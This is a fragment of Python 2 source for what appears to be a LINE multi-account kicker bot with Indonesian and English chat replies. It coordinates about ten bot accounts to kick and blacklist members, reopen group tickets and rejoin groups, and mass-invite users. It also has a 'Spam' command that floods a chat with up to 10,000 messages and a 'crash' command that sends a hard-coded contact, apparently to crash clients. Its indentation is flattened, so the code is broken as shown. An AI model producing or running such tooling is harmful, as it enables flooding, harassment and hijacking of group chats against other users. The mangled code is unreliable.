print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k3.getGroup(op.param1)
G.preventJoinByTicket = False
k3.updateGroup(G)
Ti = k3.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k2.getGroup(op.param1)
X.preventJoinByTicket = True
k2.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
k4.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k4.getGroup(op.param1)
G.preventJoinByTicket = False
k4.updateGroup(G)
Ti = k4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k3.getGroup(op.param1)
X.preventJoinByTicket = True
k3.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
k5.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k5.getGroup(op.param1)
G.preventJoinByTicket = False
k5.updateGroup(G)
Ti = k5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k4.getGroup(op.param1)
X.preventJoinByTicket = True
k4.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Imid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = k5.getGroup(op.param1)
G.preventJoinByTicket = True
k5.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------------------------------
if op.type == 19:
            if op.param3 in admin: # an admin was kicked
if op.param2 in Bots:
pass
if op.param3 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if mid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = random.choice(DEF).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(DEF).updateGroup(G)
Ti = random.choice(DEF).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X = random.choice(DEF).getGroup(op.param1)
X.preventJoinByTicket = True
random.choice(DEF).updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#--------------------------------
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
                    url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","Min"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
#===========================================
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
                    gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
                    gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "|| ADMIN=BABANG ADHI||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
                        gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
k1.findAndAddContactsByMid(target)
k2.findAndAddContactsByMid(target)
k3.findAndAddContactsByMid(target)
k4.findAndAddContactsByMid(target)
k5.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
        #-------------=SC AllBio=---------------- change the bio of every bot; format => Allbio: <anything you like> :D
elif "Allbio:" in msg.text:
if msg.from_ in admin:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k1.getProfile()
profile.statusMessage = string
k1.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k2.getProfile()
profile.statusMessage = string
k2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k3.getProfile()
profile.statusMessage = string
k3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k4.getProfile()
profile.statusMessage = string
k4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k5.getProfile()
profile.statusMessage = string
k5.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
        #--------------= SC Change the bot display names =--------------
elif "Myname:" in msg.text:
if msg.from_ in admin:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k1.getProfile()
profile.displayName = string
k1.updateProfile(profile)
k1.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k2.getProfile()
profile.displayName = string
k2.updateProfile(profile)
k2.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k3.getProfile()
profile.displayName = string
k3.updateProfile(profile)
k3.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k4.getProfile()
profile.displayName = string
k4.updateProfile(profile)
k4.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k5.getProfile()
profile.displayName = string
k5.updateProfile(profile)
k5.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Spam " in msg.text:
                if msg.from_ in admin:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
        #-----------------= Done =------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
k1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
k2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
k3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
k4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
k5.sendMessage(msg)
#====================================================
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg.to, "Add Bosque")
elif msg.text in ["You"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["愛�プレゼント","All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy buka qr","Luffy open qr"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Plak")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro buka qr","Zorro open qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji open qr","Sanji buka qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy close qr","Luffy tutup qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro tutup qr","Zorro close qr"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Plak")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji tutup qr","Sanji close qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
k1.sendText(msg.to,Emid)
k2.sendText(msg.to,Fmid)
k3.sendText(msg.to,Gmid)
			k4.sendText(msg.to,Hmid)  # was Gmid; matched to the Bot? contact mapping above
			k5.sendText(msg.to,Imid)  # was Gmid; matched to the Bot? contact mapping above
elif "Koplaxs" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,Smid)
elif "Luffy" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,mid)
elif "Zorro" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Amid)
elif "Sanji" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Bmid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() in ["gift","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
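	# Sticker shortcuts: contentType 7 sends a sticker; STKPKGID/STKID select the pack and
	# the sticker inside it (package 1 is the basic LINE sticker set).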
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
